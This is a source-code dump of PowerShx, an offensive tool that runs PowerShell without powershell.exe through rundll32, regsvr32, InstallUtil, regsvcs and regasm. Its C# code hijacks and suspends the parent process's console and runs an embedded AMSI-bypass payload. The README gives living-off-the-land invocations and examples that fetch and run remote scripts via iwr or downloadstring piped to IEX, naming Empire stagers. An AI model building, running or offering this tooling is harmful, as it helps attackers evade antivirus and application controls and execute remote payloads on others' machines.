147 | #region Print Version About Text
148 |
149 | private static void PrintAbout()
150 | {
151 | _pp = Process.GetCurrentProcess().Parent();
152 | PSConsole.StealConsole(_pp);
153 | Console.CancelKeyPress += delegate
154 | {
155 | Cleanup();
156 | };
157 |
158 | Console.WriteLine();
159 | if (Console.BackgroundColor == ConsoleColor.Black)
160 | {
161 | Console.ForegroundColor = ConsoleColor.Green;
162 | }
163 |
164 | foreach (var s in SharedGlobals.About)
165 | {
166 | Console.SetCursorPosition((Console.WindowWidth - s.Length) / 2, Console.CursorTop);
167 | Console.WriteLine(s);
168 | }
169 |
170 | Console.WriteLine();
171 | Console.ResetColor();
172 | }
173 |
174 | #endregion
175 | }
176 | }
177 |
--------------------------------------------------------------------------------
/Dll/Properties/AssemblyInfo.cs:
--------------------------------------------------------------------------------
1 | using System.Reflection;
2 | using System.Runtime.CompilerServices;
3 | using System.Runtime.InteropServices;
4 |
5 | // General Information about an assembly is controlled through the following
6 | // set of attributes. Change these attribute values to modify the information
7 | // associated with an assembly.
8 | [assembly: AssemblyTitle("PowerShxDll")]
9 | [assembly: AssemblyDescription("")]
10 | [assembly: AssemblyConfiguration("")]
11 | [assembly: AssemblyCompany("")]
12 | [assembly: AssemblyProduct("PowerShxDll")]
13 | [assembly: AssemblyCopyright("Copyright © 2021")]
14 | [assembly: AssemblyTrademark("")]
15 | [assembly: AssemblyCulture("")]
16 |
17 | // Setting ComVisible to false makes the types in this assembly not visible
18 | // to COM components. If you need to access a type in this assembly from
19 | // COM, set the ComVisible attribute to true on that type.
20 | [assembly: ComVisible(false)]
21 |
22 | // The following GUID is for the ID of the typelib if this project is exposed to COM
23 | [assembly: Guid("49550802-bd8e-4a73-be1f-fca30770004e")]
24 |
25 | // Version information for an assembly consists of the following four values:
26 | //
27 | // Major Version
28 | // Minor Version
29 | // Build Number
30 | // Revision
31 | //
32 | // You can specify all the values or you can default the Build and Revision Numbers
33 | // by using the '*' as shown below:
34 | // [assembly: AssemblyVersion("1.0.*")]
35 | [assembly: AssemblyVersion("1.0.0.0")]
36 | [assembly: AssemblyFileVersion("1.0.0.0")]
37 |
--------------------------------------------------------------------------------
/Dll/PsSession.cs:
--------------------------------------------------------------------------------
1 | using System;
2 | using System.Diagnostics;
3 | using System.IO;
4 | using System.Text;
5 | using Common;
6 |
7 | namespace W
8 | {
9 | public class PsSession
10 | {
11 | private readonly PS _ps = new PS();
12 | private Process _pp = new Process();
13 | private readonly PSConsole _psConsole = new PSConsole();
14 |
15 |
16 |
17 | public void Start(Options options)
18 | {
19 | try
20 | {
21 | if (options == null)
22 | options = new Options();
23 |
24 | Handle(options);
25 | }
26 | catch (Exception e)
27 | {
28 | Console.WriteLine(e.Message);
29 | }
30 | finally
31 | {
32 | _ps.Close();
33 | Cleanup();
34 | Environment.Exit(1);
35 | }
36 | }
37 |
38 | private void Handle(Options options)
39 | {
40 |
41 | if (options.BypassAmsi)
42 | {
43 | _ps.Exe(Payloads.PayloadDict["amsi"]);
44 | }
45 |
46 |
47 | if (options.ConsoleNewWindow)
48 | {
49 | _psConsole.GetNewConsole();
50 | Interact();
51 | return;
52 | }
53 |
54 |
55 | if (options.Interactive)
56 | {
57 | _pp = Process.GetCurrentProcess().Parent();
58 | _pp.Suspend();
59 |
60 | _psConsole.StealConsole(_pp);
61 | Console.Title = "cx";
62 | Console.CancelKeyPress += delegate
63 | {
64 | Cleanup();
65 | };
66 |
67 | Console.SetCursorPosition(0, Console.CursorTop + 1);
68 | Console.WriteLine("Press Enter to get started:");
69 | Console.Write("\n");
70 | Interact();
71 | _pp.Resume();
72 |
73 | return;
74 | }
75 |
76 |
77 | if (!string.IsNullOrEmpty(options.Cmdlet?.Trim()) && !string.IsNullOrWhiteSpace(options.Cmdlet?.Trim()) && !string.IsNullOrEmpty(options.ScriptPath?.Trim()) && !string.IsNullOrWhiteSpace(options.ScriptPath?.Trim()))
78 | {
79 | if (!File.Exists(options.ScriptPath))
80 | return;
81 |
82 | var script = LoadScript(options.ScriptPath.Trim());
83 | if (string.IsNullOrEmpty(script) || script == "error")
84 | return;
85 |
86 | _ps.Exe(script);
87 | Exec(script, false);
88 | Exec(options.Cmdlet, options.ShowConsole);
89 | return;
90 | }
91 |
92 | if (string.IsNullOrEmpty(options.Cmdlet?.Trim()) && string.IsNullOrWhiteSpace(options.Cmdlet?.Trim()) && !string.IsNullOrEmpty(options.ScriptPath?.Trim()) && !string.IsNullOrWhiteSpace(options.ScriptPath?.Trim()))
93 | {
94 | if (!File.Exists(options.ScriptPath))
95 | return;
96 |
97 | var script = LoadScript(options.ScriptPath.Trim());
98 |
99 | if (string.IsNullOrEmpty(script) || script == "error")
100 | return;
101 |
102 | Exec(options.Cmdlet, options.ShowConsole);
103 | return;
104 | }
105 |
106 | if (!string.IsNullOrEmpty(options.Script?.Trim()) && !string.IsNullOrWhiteSpace(options.Script?.Trim()))
107 | {
108 | Exec(options.Script, options.ShowConsole);
109 | return;
110 | }
111 | }
112 |
113 | private void Cleanup()
114 | {
115 | try
116 | {
117 | _pp.Resume();
118 | }
119 | catch
120 | {
121 | //
122 | }
123 | }
124 |
125 |
126 | private void Interact()
127 | {
128 | var cmd = "";
129 | Console.WriteLine();
130 | while (cmd != null && cmd.ToLower() != "exit")
131 | {
132 | Console.Write("PS " + _ps.Exe("$(get-location).Path").Replace(Environment.NewLine, string.Empty) + ">");
133 | cmd = Console.ReadLine();
134 | Console.WriteLine(_ps.Exe(cmd));
135 | }
136 | }
137 |
138 | private void Exec(string script, bool showConsole)
139 | {
140 | if (showConsole)
141 | {
142 | var result = _ps.Exe(script?.Trim());
143 | Print(result);
144 | Console.WriteLine(result);
145 | }
146 | else
147 | {
148 | _ps.Exe(script?.Trim());
149 | }
150 | }
151 |
152 | private string LoadScript(string filename)
153 | {
154 | try
155 | {
156 | using (var sr = new StreamReader(filename))
157 | {
158 | var fileContents = new StringBuilder();
159 | string curLine;
160 | while ((curLine = sr.ReadLine()) != null)
161 | {
162 | fileContents.Append(curLine + "\n");
163 | }
164 | return fileContents.ToString();
165 | }
166 | }
167 | catch (Exception e)
168 | {
169 | var errorText = e.Message + "\n";
170 | Print(errorText);
171 | return "error";
172 | }
173 | }
174 |
175 |
176 |
177 | #region Print, Version About Text
178 |
179 | private void Print(string msg)
180 | {
181 | _pp = Process.GetCurrentProcess().Parent();
182 | _psConsole.StealConsole(_pp);
183 | Console.CancelKeyPress += delegate
184 | {
185 | Cleanup();
186 | };
187 | Console.SetCursorPosition(0, Console.CursorTop + 1);
188 |
189 | Console.WriteLine(msg);
190 | }
191 |
192 |
193 |
194 | #endregion
195 | }
196 | }
197 |
--------------------------------------------------------------------------------
/Dll/SharedGlobals.cs:
--------------------------------------------------------------------------------
1 | using System.Text;
2 |
3 | namespace W
4 | {
5 | internal static class SharedGlobals
6 | {
7 | public static readonly string[] About = { "PowerShx v1.0", "github.com/iomoath/PowerShx" };
8 |
9 | public static string UsageExamples()
10 | {
11 | var sb = new StringBuilder();
12 |
13 | sb.AppendLine(string.Format("{0,-55} {1,-10}", "rundll32 PowerShx.dll,main -e", ""));
14 | sb.AppendLine(string.Format("{0,-55} {1,-10}", "rundll32 PowerShx.dll,main -f ", "Run the script passed as argument"));
15 | sb.AppendLine(string.Format("{0,-55} {1,-10}", "rundll32 PowerShx.dll,main -f -c ", "Load a script and run a PS cmdlet"));
16 | sb.AppendLine(string.Format("{0,-55} {1,-10}", "rundll32 PowerShx.dll,main -w", "Start an interactive console in a new window"));
17 | sb.AppendLine(string.Format("{0,-55} {1,-10}", "rundll32 PowerShx.dll,main -i", "Start an interactive console"));
18 | sb.AppendLine(string.Format("{0,-55} {1,-10}", "rundll32 PowerShx.dll,main -s", "Attempt to bypass AMSI"));
19 | sb.AppendLine(string.Format("{0,-55} {1,-10}", "rundll32 PowerShx.dll,main -v", "Print Execution Output to the console"));
20 |
21 | return sb.ToString();
22 | }
23 | }
24 | }
25 |
--------------------------------------------------------------------------------
/Dll/packages.config:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 |
6 |
7 |
--------------------------------------------------------------------------------
/Exe/FodyWeavers.xml:
--------------------------------------------------------------------------------
1 |
2 |
3 |
--------------------------------------------------------------------------------
/Exe/Options.cs:
--------------------------------------------------------------------------------
1 | using CommandLine;
2 |
3 | namespace Q
4 | {
5 | public class Options
6 | {
7 | [Option('e', Required = false, HelpText = "")]
8 | public string Script { get; set; }
9 |
10 |
11 | [Option('f', Required = false, HelpText = "Run the script passed as argument. -f ")]
12 | public string ScriptPath { get; set; }
13 |
14 | [Option('c', Required = false, HelpText = "Load a script and run a PS cmdlet. -f -c ")]
15 | public string Cmdlet { get; set; }
16 |
17 |
18 | [Option('i', Required = false, HelpText = "Start an interactive console")]
19 | public bool Interactive { get; set; }
20 |
21 |
22 | [Option('s', Required = false, HelpText = "Attempt to bypass AMSI.")]
23 | public bool BypassAmsi { get; set; }
24 | }
25 | }
26 |
--------------------------------------------------------------------------------
/Exe/PowerShxExe.csproj:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 |
6 | Debug
7 | AnyCPU
8 | {A17656B2-42D1-42CD-B76D-9B60F637BCB5}
9 | Exe
10 | Q
11 | PowerShx
12 | v4.0
13 | 512
14 | true
15 |
16 |
17 |
18 |
19 |
20 | AnyCPU
21 | true
22 | full
23 | false
24 | bin\Debug\
25 | DEBUG;TRACE
26 | prompt
27 | 4
28 | false
29 |
30 |
31 | x64
32 | none
33 | false
34 | bin\Release\
35 | TRACE
36 | none
37 | 4
38 | false
39 |
40 |
41 | true
42 |
43 |
44 | false
45 |
46 |
47 | true
48 | bin\x86\Debug\
49 | DEBUG;TRACE
50 | full
51 | AnyCPU
52 | 7.3
53 | prompt
54 |
55 |
56 | bin\x86\Release\
57 | TRACE
58 | true
59 | x86
60 | 7.3
61 | none
62 |
63 |
64 | true
65 | bin\x64\Debug\
66 | DEBUG;TRACE
67 | full
68 | x64
69 | 7.3
70 | prompt
71 |
72 |
73 | bin\x64\Release\
74 | TRACE
75 | true
76 | x64
77 | 7.3
78 | none
79 |
80 |
81 |
82 | ..\packages\CommandLineParser.2.8.0\lib\net40\CommandLine.dll
83 |
84 |
85 | ..\packages\Costura.Fody.4.1.0\lib\net40\Costura.dll
86 |
87 |
88 |
89 |
90 |
91 |
92 |
93 |
94 |
95 |
96 |
97 |
98 |
99 |
100 |
101 |
102 |
103 |
104 |
105 |
106 |
107 |
108 | {5c578418-cf03-400a-882b-73be43d8e957}
109 | Common
110 |
111 |
112 |
113 |
114 |
115 |
116 | This project references NuGet package(s) that are missing on this computer. Use NuGet Package Restore to download them. For more information, see http://go.microsoft.com/fwlink/?LinkID=322105. The missing file is {0}.
117 |
118 |
119 |
120 |
121 |
--------------------------------------------------------------------------------
/Exe/Program.cs:
--------------------------------------------------------------------------------
1 | using System;
2 | using System.Collections.Generic;
3 | using CommandLine;
4 | using CommandLine.Text;
5 |
6 | namespace Q
7 | {
8 | public class Program
9 | {
10 | #region Main
11 | public static void Main(string[] args)
12 | {
13 | if (args.Length == 0)
14 | {
15 | PrintAbout();
16 | Console.WriteLine();
17 | SharedGlobals.ShowUsageExamples();
18 | return;
19 | }
20 |
21 | var ps = new PsSession();
22 |
23 | try
24 | {
25 |
26 | var options = ParseUserArgs(args);
27 | if (options == null)
28 | return;
29 |
30 | ps.Start(options);
31 | }
32 | catch (Exception e)
33 | {
34 | Console.WriteLine(e.Message);
35 | }
36 | finally
37 | {
38 | Console.Read();
39 | Environment.Exit(1);
40 | }
41 | }
42 |
43 |
44 | #endregion
45 |
46 | #region Args Parsing
47 |
48 | private static Options ParseUserArgs(string[] args)
49 | {
50 | // Parse arguments passed
51 | var parser = new Parser(with =>
52 | {
53 | with.CaseInsensitiveEnumValues = true;
54 | with.CaseSensitive = false;
55 | with.HelpWriter = null;
56 | });
57 |
58 |
59 | Options options = null;
60 |
61 | var parserResult = parser.ParseArguments(args);
62 | parserResult.WithParsed(o => { options = o; }).WithNotParsed(errs => DisplayHelp(parserResult, errs));
63 |
64 | return options;
65 | }
66 |
67 | private static void DisplayHelp(ParserResult result, IEnumerable errs)
68 | {
69 | var helpText = HelpText.AutoBuild(result, h =>
70 | {
71 | h.AdditionalNewLineAfterOption = false;
72 | h.AutoVersion = false;
73 | return HelpText.DefaultParsingErrorsHandler(result, h);
74 | }, e => e);
75 |
76 | Console.WriteLine(helpText);
77 | }
78 |
79 | #endregion
80 |
81 |
82 | #region Print Version About Text
83 |
84 | private static void PrintAbout()
85 | {
86 | Console.WriteLine();
87 | if (Console.BackgroundColor == ConsoleColor.Black)
88 | {
89 | Console.ForegroundColor = ConsoleColor.Green;
90 | }
91 |
92 | foreach (var s in SharedGlobals.About)
93 | {
94 | Console.SetCursorPosition((Console.WindowWidth - s.Length) / 2, Console.CursorTop);
95 | Console.WriteLine(s);
96 | }
97 |
98 | Console.WriteLine();
99 | Console.ResetColor();
100 | }
101 |
102 | #endregion
103 | }
104 | }
--------------------------------------------------------------------------------
/Exe/Properties/AssemblyInfo.cs:
--------------------------------------------------------------------------------
1 | using System.Reflection;
2 | using System.Runtime.CompilerServices;
3 | using System.Runtime.InteropServices;
4 |
5 | // General Information about an assembly is controlled through the following
6 | // set of attributes. Change these attribute values to modify the information
7 | // associated with an assembly.
8 | [assembly: AssemblyTitle("PowerShx")]
9 | [assembly: AssemblyDescription("")]
10 | [assembly: AssemblyConfiguration("")]
11 | [assembly: AssemblyCompany("")]
12 | [assembly: AssemblyProduct("PowerShx")]
13 | [assembly: AssemblyCopyright("Copyright © 2021")]
14 | [assembly: AssemblyTrademark("")]
15 | [assembly: AssemblyCulture("")]
16 |
17 | // Setting ComVisible to false makes the types in this assembly not visible
18 | // to COM components. If you need to access a type in this assembly from
19 | // COM, set the ComVisible attribute to true on that type.
20 | [assembly: ComVisible(false)]
21 |
22 | // The following GUID is for the ID of the typelib if this project is exposed to COM
23 | [assembly: Guid("4d45b854-a603-410f-ad64-a113cb0e153d")]
24 |
25 | // Version information for an assembly consists of the following four values:
26 | //
27 | // Major Version
28 | // Minor Version
29 | // Build Number
30 | // Revision
31 | //
32 | // You can specify all the values or you can default the Build and Revision Numbers
33 | // by using the '*' as shown below:
34 | // [assembly: AssemblyVersion("1.0.*")]
35 | [assembly: AssemblyVersion("1.0.0.0")]
36 | [assembly: AssemblyFileVersion("1.0.0.0")]
37 |
--------------------------------------------------------------------------------
/Exe/PsSession.cs:
--------------------------------------------------------------------------------
1 | using System;
2 | using System.IO;
3 | using System.Text;
4 | using Common;
5 |
6 | namespace Q
7 | {
8 | public class PsSession
9 | {
10 | private PS _ps = new PS();
11 |
12 | public void Start(Options options)
13 | {
14 | Console.Title = "cx";
15 |
16 | try
17 | {
18 | Handle(options);
19 | }
20 | catch (Exception e)
21 | {
22 | Console.WriteLine(e.Message);
23 | }
24 | finally
25 | {
26 | _ps.Close();
27 | }
28 | }
29 |
30 | private void Handle(Options options)
31 | {
32 | if (options.BypassAmsi)
33 | {
34 | _ps.Exe(Payloads.PayloadDict["amsi"]);
35 | }
36 |
37 | if (options.Interactive)
38 | {
39 |
40 | Interact();
41 | return;
42 | }
43 |
44 | if (!string.IsNullOrEmpty(options.Script?.Trim()) && !string.IsNullOrWhiteSpace(options.Script?.Trim()))
45 | {
46 | Console.WriteLine(_ps.Exe(options.Script?.Trim()));
47 | return;
48 | }
49 |
50 | if (!string.IsNullOrEmpty(options.Cmdlet?.Trim()) && !string.IsNullOrWhiteSpace(options.Cmdlet?.Trim()) && !string.IsNullOrEmpty(options.ScriptPath?.Trim()) && !string.IsNullOrWhiteSpace(options.ScriptPath?.Trim()))
51 | {
52 | if (!File.Exists(options.ScriptPath))
53 | return;
54 |
55 | var script = LoadScript(options.ScriptPath.Trim());
56 |
57 | if (string.IsNullOrEmpty(script) || script == "error")
58 | return;
59 |
60 | _ps.Exe(script);
61 | Console.WriteLine(_ps.Exe(options.Cmdlet));
62 | }
63 |
64 | if (string.IsNullOrEmpty(options.Cmdlet?.Trim()) && string.IsNullOrWhiteSpace(options.Cmdlet?.Trim()) && !string.IsNullOrEmpty(options.ScriptPath?.Trim()) && !string.IsNullOrWhiteSpace(options.ScriptPath?.Trim()))
65 | {
66 | if (!File.Exists(options.ScriptPath))
67 | return;
68 |
69 | var script = LoadScript(options.ScriptPath.Trim());
70 |
71 | if (string.IsNullOrEmpty(script) || script == "error")
72 | return;
73 |
74 | Console.WriteLine(_ps.Exe(script));
75 | }
76 | }
77 |
78 | private void Interact()
79 | {
80 | var cmd = "";
81 | Console.WriteLine();
82 | while (cmd != null && cmd.ToLower() != "exit")
83 | {
84 | Console.Write("PS " + _ps.Exe("$(get-location).Path").Replace(Environment.NewLine, string.Empty) + ">");
85 | cmd = Console.ReadLine();
86 | Console.WriteLine(_ps.Exe(cmd));
87 | }
88 | }
89 |
90 | private string LoadScript(string filename)
91 | {
92 | try
93 | {
94 | using (var sr = new StreamReader(filename))
95 | {
96 | var fileContents = new StringBuilder();
97 | string curLine;
98 | while ((curLine = sr.ReadLine()) != null)
99 | {
100 | fileContents.Append(curLine + "\n");
101 | }
102 | return fileContents.ToString();
103 | }
104 | }
105 | catch (Exception e)
106 | {
107 | var errorText = e.Message + "\n";
108 | Console.WriteLine(errorText);
109 | return "error";
110 | }
111 | }
112 | }
113 |
114 | }
115 |
--------------------------------------------------------------------------------
/Exe/SharedGlobals.cs:
--------------------------------------------------------------------------------
1 | using System;
2 |
3 | namespace Q
4 | {
5 | internal static class SharedGlobals
6 | {
7 | public static readonly string[] About = { "PowerShx v1.0", "github.com/iomoath/PowerShx" };
8 |
9 | public static void ShowUsageExamples()
10 | {
11 | Console.WriteLine(string.Format("{0,-40} {1,-10}", "PowerShx.exe -i", "Start an interactive console"));
12 | Console.WriteLine(string.Format("{0,-40} {1,-10}", "PowerShx.exe -e", ""));
13 | Console.WriteLine(string.Format("{0,-40} {1,-10}", "PowerShx.exe -f ", "Run the script passed as argument"));
14 | Console.WriteLine(string.Format("{0,-40} {1,-10}", "PowerShx.exe -f -c ", "Load a script and run a PS cmdlet"));
15 | Console.WriteLine(string.Format("{0,-40} {1,-10}", "PowerShx.exe -s", "Attempt to bypass AMSI. Use with -f and -e"));
16 | }
17 | }
18 | }
19 |
--------------------------------------------------------------------------------
/Exe/app.config:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
--------------------------------------------------------------------------------
/Exe/packages.config:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 |
6 |
--------------------------------------------------------------------------------
/LICENSE:
--------------------------------------------------------------------------------
1 | MIT License
2 |
3 | Copyright (c) 2017 p3nt4
4 |
5 | Permission is hereby granted, free of charge, to any person obtaining a copy
6 | of this software and associated documentation files (the "Software"), to deal
7 | in the Software without restriction, including without limitation the rights
8 | to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
9 | copies of the Software, and to permit persons to whom the Software is
10 | furnished to do so, subject to the following conditions:
11 |
12 | The above copyright notice and this permission notice shall be included in all
13 | copies or substantial portions of the Software.
14 |
15 | THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
16 | IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
17 | FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
18 | AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
19 | LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
20 | OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
21 | SOFTWARE.
22 |
--------------------------------------------------------------------------------
/PowerShx.sln:
--------------------------------------------------------------------------------
1 |
2 | Microsoft Visual Studio Solution File, Format Version 12.00
3 | # Visual Studio Version 16
4 | VisualStudioVersion = 16.0.31424.327
5 | MinimumVisualStudioVersion = 10.0.40219.1
6 | Project("{FAE04EC0-301F-11D3-BF4B-00C04F79EFBC}") = "PowerShxExe", "Exe\PowerShxExe.csproj", "{A17656B2-42D1-42CD-B76D-9B60F637BCB5}"
7 | EndProject
8 | Project("{FAE04EC0-301F-11D3-BF4B-00C04F79EFBC}") = "PowerShxDll", "Dll\PowerShxDll.csproj", "{1E70D62D-CC36-480F-82BB-E9593A759AF9}"
9 | EndProject
10 | Project("{FAE04EC0-301F-11D3-BF4B-00C04F79EFBC}") = "Common", "Common\Common.csproj", "{5C578418-CF03-400A-882B-73BE43D8E957}"
11 | EndProject
12 | Global
13 | GlobalSection(SolutionConfigurationPlatforms) = preSolution
14 | Debug|Any CPU = Debug|Any CPU
15 | Debug|x64 = Debug|x64
16 | Debug|x86 = Debug|x86
17 | Release|Any CPU = Release|Any CPU
18 | Release|x64 = Release|x64
19 | Release|x86 = Release|x86
20 | EndGlobalSection
21 | GlobalSection(ProjectConfigurationPlatforms) = postSolution
22 | {A17656B2-42D1-42CD-B76D-9B60F637BCB5}.Debug|Any CPU.ActiveCfg = Debug|Any CPU
23 | {A17656B2-42D1-42CD-B76D-9B60F637BCB5}.Debug|Any CPU.Build.0 = Debug|Any CPU
24 | {A17656B2-42D1-42CD-B76D-9B60F637BCB5}.Debug|x64.ActiveCfg = Debug|x64
25 | {A17656B2-42D1-42CD-B76D-9B60F637BCB5}.Debug|x64.Build.0 = Debug|x64
26 | {A17656B2-42D1-42CD-B76D-9B60F637BCB5}.Debug|x86.ActiveCfg = Debug|x86
27 | {A17656B2-42D1-42CD-B76D-9B60F637BCB5}.Debug|x86.Build.0 = Debug|x86
28 | {A17656B2-42D1-42CD-B76D-9B60F637BCB5}.Release|Any CPU.ActiveCfg = Release|Any CPU
29 | {A17656B2-42D1-42CD-B76D-9B60F637BCB5}.Release|Any CPU.Build.0 = Release|Any CPU
30 | {A17656B2-42D1-42CD-B76D-9B60F637BCB5}.Release|x64.ActiveCfg = Release|x64
31 | {A17656B2-42D1-42CD-B76D-9B60F637BCB5}.Release|x64.Build.0 = Release|x64
32 | {A17656B2-42D1-42CD-B76D-9B60F637BCB5}.Release|x86.ActiveCfg = Release|x86
33 | {A17656B2-42D1-42CD-B76D-9B60F637BCB5}.Release|x86.Build.0 = Release|x86
34 | {1E70D62D-CC36-480F-82BB-E9593A759AF9}.Debug|Any CPU.ActiveCfg = Debug|Any CPU
35 | {1E70D62D-CC36-480F-82BB-E9593A759AF9}.Debug|Any CPU.Build.0 = Debug|Any CPU
36 | {1E70D62D-CC36-480F-82BB-E9593A759AF9}.Debug|x64.ActiveCfg = Debug|x64
37 | {1E70D62D-CC36-480F-82BB-E9593A759AF9}.Debug|x64.Build.0 = Debug|x64
38 | {1E70D62D-CC36-480F-82BB-E9593A759AF9}.Debug|x86.ActiveCfg = Debug|x86
39 | {1E70D62D-CC36-480F-82BB-E9593A759AF9}.Debug|x86.Build.0 = Debug|x86
40 | {1E70D62D-CC36-480F-82BB-E9593A759AF9}.Release|Any CPU.ActiveCfg = Release|Any CPU
41 | {1E70D62D-CC36-480F-82BB-E9593A759AF9}.Release|Any CPU.Build.0 = Release|Any CPU
42 | {1E70D62D-CC36-480F-82BB-E9593A759AF9}.Release|x64.ActiveCfg = Release|x64
43 | {1E70D62D-CC36-480F-82BB-E9593A759AF9}.Release|x64.Build.0 = Release|x64
44 | {1E70D62D-CC36-480F-82BB-E9593A759AF9}.Release|x86.ActiveCfg = Release|x86
45 | {1E70D62D-CC36-480F-82BB-E9593A759AF9}.Release|x86.Build.0 = Release|x86
46 | {5C578418-CF03-400A-882B-73BE43D8E957}.Debug|Any CPU.ActiveCfg = Debug|Any CPU
47 | {5C578418-CF03-400A-882B-73BE43D8E957}.Debug|Any CPU.Build.0 = Debug|Any CPU
48 | {5C578418-CF03-400A-882B-73BE43D8E957}.Debug|x64.ActiveCfg = Debug|x64
49 | {5C578418-CF03-400A-882B-73BE43D8E957}.Debug|x64.Build.0 = Debug|x64
50 | {5C578418-CF03-400A-882B-73BE43D8E957}.Debug|x86.ActiveCfg = Debug|x86
51 | {5C578418-CF03-400A-882B-73BE43D8E957}.Debug|x86.Build.0 = Debug|x86
52 | {5C578418-CF03-400A-882B-73BE43D8E957}.Release|Any CPU.ActiveCfg = Release|Any CPU
53 | {5C578418-CF03-400A-882B-73BE43D8E957}.Release|Any CPU.Build.0 = Release|Any CPU
54 | {5C578418-CF03-400A-882B-73BE43D8E957}.Release|x64.ActiveCfg = Release|x64
55 | {5C578418-CF03-400A-882B-73BE43D8E957}.Release|x64.Build.0 = Release|x64
56 | {5C578418-CF03-400A-882B-73BE43D8E957}.Release|x86.ActiveCfg = Release|x86
57 | {5C578418-CF03-400A-882B-73BE43D8E957}.Release|x86.Build.0 = Release|x86
58 | EndGlobalSection
59 | GlobalSection(SolutionProperties) = preSolution
60 | HideSolutionNode = FALSE
61 | EndGlobalSection
62 | GlobalSection(ExtensibilityGlobals) = postSolution
63 | SolutionGuid = {7F689D28-8DC2-4E20-9AD1-AFBF57048C11}
64 | EndGlobalSection
65 | EndGlobal
66 |
--------------------------------------------------------------------------------
/README.md:
--------------------------------------------------------------------------------
1 |
2 |
SharpShx
3 |
4 |
5 |
6 | Unmanaged PowerShell execution using DLLs or a standalone executable.
7 |
8 | ## Introduction
9 | PowerShx is a rewrite and expansion on the [PowerShdll](https://github.com/p3nt4/PowerShdll) project. PowerShx provide functionalities for bypassing AMSI and running PS Cmdlets.
10 |
11 |
12 | ### Features
13 | - Run Powershell with DLLs using rundll32.exe, installutil.exe, regsvcs.exe or regasm.exe, regsvr32.exe.
14 | - Run Powershell without powershell.exe or powershell_ise.exe
15 | - AMSI Bypass features.
16 | - Run Powershell scripts directly from the command line or Powershell files
17 | - Import Powershell modules and execute Powershell Cmdlets.
18 |
19 |
20 | ## Usage
21 |
22 | ### .dll version
23 | #### rundll32
24 | ```
25 | rundll32 PowerShx.dll,main -e
26 | rundll32 PowerShx.dll,main -f Run the script passed as argument
27 | rundll32 PowerShx.dll,main -f -c Load a script and run a PS cmdlet
28 | rundll32 PowerShx.dll,main -w Start an interactive console in a new window
29 | rundll32 PowerShx.dll,main -i Start an interactive console
30 | rundll32 PowerShx.dll,main -s Attempt to bypass AMSI
31 | rundll32 PowerShx.dll,main -v Print Execution Output to the console
32 | ```
33 |
34 | #### Alternatives (Credit to SubTee for these techniques):
35 | ```
36 | 1.
37 | x86 - C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe /logfile= /LogToConsole=false /U PowerShx.dll
38 | x64 - C:\Windows\Microsoft.NET\Framework64\v4.0.3031964\InstallUtil.exe /logfile= /LogToConsole=false /U PowerShx.dll
39 | 2.
40 | x86 C:\Windows\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe PowerShx.dll
41 | x64 C:\Windows\Microsoft.NET\Framework64\v4.0.30319\regsvcs.exe PowerShx.dll
42 | 3.
43 | x86 C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe /U PowerShx.dll
44 | x64 C:\Windows\Microsoft.NET\Framework64\v4.0.30319\regasm.exe /U PowerShx.dll
45 | 4.
46 | regsvr32 /s /u PowerShx.dll -->Calls DllUnregisterServer
47 | regsvr32 /s PowerShx.dll --> Calls DllRegisterServer
48 | ```
49 |
50 | ### .exe version
51 | ```
52 | PowerShx.exe -i Start an interactive console
53 | PowerShx.exe -e
54 | PowerShx.exe -f Run the script passed as argument
55 | PowerShx.exe -f -c Load a script and run a PS cmdlet
56 | PowerShx.exe -s Attempt to bypass AMSI.
57 | ```
58 |
59 | ## Embedded payloads
60 | Payloads can be embedded by updating the data dictionary "Common.Payloads.PayloadDict" in the "Common" project and calling it in the method PsSession.cs -> Handle() .
61 | Example: in Handle() method:
62 |
63 | ```
64 | private void Handle(Options options)
65 | {
66 | // Pre-execution before user script
67 | _ps.Exe(Payloads.PayloadDict["amsi"]);
68 | }
69 | ```
70 |
71 |
72 | ## Examples
73 | #### Run a base64 encoded script
74 | ```
75 | rundll32 PowerShx.dll,main [System.Text.Encoding]::Default.GetString([System.Convert]::FromBase64String("BASE64")) ^| iex
76 |
77 | PowerShx.exe -e [System.Text.Encoding]::Default.GetString([System.Convert]::FromBase64String("BASE64")) ^| iex
78 | ```
79 | Note: Empire stagers need to be decoded using [System.Text.Encoding]::Unicode
80 |
81 |
82 | #### Run a base64 encoded script
83 | ```
84 | rundll32 PowerShx.dll,main . { iwr -useb https://website.com/Script.ps1 } ^| iex;
85 |
86 | PowerShx.exe -e "IEX ((new-object net.webclient).downloadstring('http://192.168.100/payload-http'))"
87 | ```
88 |
89 | ## Requirements
90 | .NET 4
91 |
92 |
93 | ## Known Issues
94 | Some errors do not seem to show in the output. May be confusing as commands such as Import-Module do not output an error on failure.
95 | Make sure you have typed your commands correctly.
96 |
97 | In dll mode, interractive mode and command output rely on hijacking the parent process' console. If the parent process does not have a console, use the -n switch to not show output otherwise the application will crash.
98 |
99 | Due to the way Rundll32 handles arguments, using several space characters between switches and arguments may cause issues. Multiple spaces inside the scripts are okay.
100 |
101 |
--------------------------------------------------------------------------------
/packages/Costura.Fody.4.1.0/.signature.p7s:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/iomoath/PowerShx/fb331a3724afea3365b634a852407b70d26c7bd6/packages/Costura.Fody.4.1.0/.signature.p7s
--------------------------------------------------------------------------------
/packages/Costura.Fody.4.1.0/build/Costura.Fody.props:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 |
--------------------------------------------------------------------------------
/packages/Costura.Fody.4.1.0/lib/net40/Costura.dll:
--------------------------------------------------------------------------------
